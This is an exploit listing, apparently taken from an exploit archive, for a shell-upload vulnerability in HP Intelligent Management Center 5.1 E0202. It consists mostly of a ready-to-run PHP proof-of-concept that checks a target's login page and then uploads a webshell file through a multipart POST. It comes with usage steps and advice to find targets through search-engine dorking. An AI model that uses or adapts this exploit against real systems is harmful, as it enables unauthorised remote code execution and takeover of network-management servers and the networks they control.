Exploit for HP Intelligent Management Center 5.1 E0202 Shell Upload

Name: Exploit for HP Intelligent Management Center 5.1 E0202 Shell Upload
Rating: 5 (47 reviews)
2025-03-06 | CVSS 7.5
## https://sploitus.com/exploit?id=PACKETSTORM:189586
=============================================================================================================================================
    | # Title     : HP Intelligent Management Center 5.1 E0202 Shell Upload Vulnerability                                                       |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://support.hpe.com/hpesc/public/docDisplay?docId=c03177356                                                             |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: Upload a malicious PHP file (such as a Webshell) to the server.
    	
    [+] save code as poc.php.
    
    [+] Set Target : line 54
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    function is_imc($target) {
        $url = "$target/login.jsf";
        $response = @file_get_contents($url);
        
        if ($response !== false && strpos($response, "HP Intelligent Management Center") !== false) {
            return true;
        }
        return false;
    }
    
    function upload_file($ip, $port, $target_uri, $upload_path, $local_file) {
        if (!is_imc("http://$ip:$port$target_uri")) {
            echo "$ip:$port - This isn't an HP Intelligent Management Center\n";
            return;
        }
        
        $file_content = file_get_contents($local_file);
        if ($file_content === false) {
            echo "Failed to read local file: $local_file\n";
            return;
        }
        
        $boundary = "----WebKitFormBoundary" . md5(time());
        $eol = "\r\n";
        
        $data = "--$boundary$eol";
        $data .= "Content-Disposition: form-data; name=\"file\"; filename=\"" . basename($local_file) . "\"$eol";
        $data .= "Content-Type: application/octet-stream$eol$eol";
        $data .= $file_content . "$eol";
        $data .= "--$boundary--$eol";
        
        $opts = [
            "http" => [
                "method" => "POST",
                "header" => "Content-Type: multipart/form-data; boundary=$boundary\r\n",
                "content" => $data
            ]
        ];
        
        $url = "http://$ip:$port$target_uri/$upload_path";
        echo "$ip:$port - Uploading file...\n";
        $response = @file_get_contents($url, false, stream_context_create($opts));
        
        if ($response !== false) {
            echo "$ip:$port - File uploaded successfully to $url\n";
        } else {
            echo "$ip:$port - File upload failed\n";
        }
    }
    
    // Example usage
    $ip = "192.168.1.1";
    $port = 8080;
    $target_uri = "/imc";
    $upload_path = "uploads/shell.php"; // Adjust this path as needed
    $local_file = "shell.php"; // Your payload file
    
    upload_file($ip, $port, $target_uri, $upload_path, $local_file);
    
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================